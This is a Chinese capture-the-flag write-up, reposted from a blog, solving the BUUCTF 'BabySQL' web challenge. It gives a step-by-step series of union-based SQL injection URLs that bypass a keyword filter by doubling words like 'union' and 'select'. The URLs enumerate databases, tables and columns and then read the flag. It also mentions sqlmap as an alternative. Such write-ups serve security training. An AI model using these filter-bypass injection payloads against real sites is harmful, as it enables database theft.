【BUUCTF】[极客大挑战 2019]BabySQL1
进入页面如下
万能密码用不了了
方法一:手工注入
尝试在url中使用union联合注入(详细解释见上篇文章中)
判断字段数
http://2b3a45e9-fc56-4659-a7a0-a81361f6f49c.node5.buuoj.cn:81/check.php?username=1‘order by 3 #&password=1
发现or、by都被过滤
尝试双写绕过
有回显,判断为双写绕过
字段数为3
判断回显点在哪里
http://2b3a45e9-fc56-4659-a7a0-a81361f6f49c.node5.buuoj.cn:81/check.php?username=1’ununionion seselectlect 1,2,3 #&password=1
显示‘3’,回显点在3处
查询数据库
http://2b3a45e9-fc56-4659-a7a0-a81361f6f49c.node5.buuoj.cn:81/check.php?username=1'ununionion seselectlect 1,version(),database() #&password=1
显示数据库名
接下来查询表名
http://2b3a45e9-fc56-4659-a7a0-a81361f6f49c.node5.buuoj.cn:81/check.php?username=1'ununionion seselectlect 1,2,group_concat(schema_name) frfromom infoorrmation_
schema.schemata #&password=1
查询表名
尝试ctf表
http://2b3a45e9-fc56-4659-a7a0-a81361f6f49c.node5.buuoj.cn:81/check.php?username=1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorr
mation_schema.tables whwhereere table_schema='ctf' #&password=1
ctf数据库中存在flag表
查询字段名
http://2b3a45e9-fc56-4659-a7a0-a81361f6f49c.node5.buuoj.cn:81/check.php?username=1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorr
mation_schema.columns whwhereere table_schema='ctf'#&password=1
查询flag字段的内容
http://2b3a45e9-fc56-4659-a7a0-a81361f6f49c.node5.buuoj.cn:81/check.php?username=1'ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag#&password=1
最终得到flag
方法二:sqlmap注入
详情见上篇文章,命令方法大同小异
原文地址:https://blog.csdn.net/2401_86760082/article/details/145190941
免责声明:本站文章内容转载自网络资源,如侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!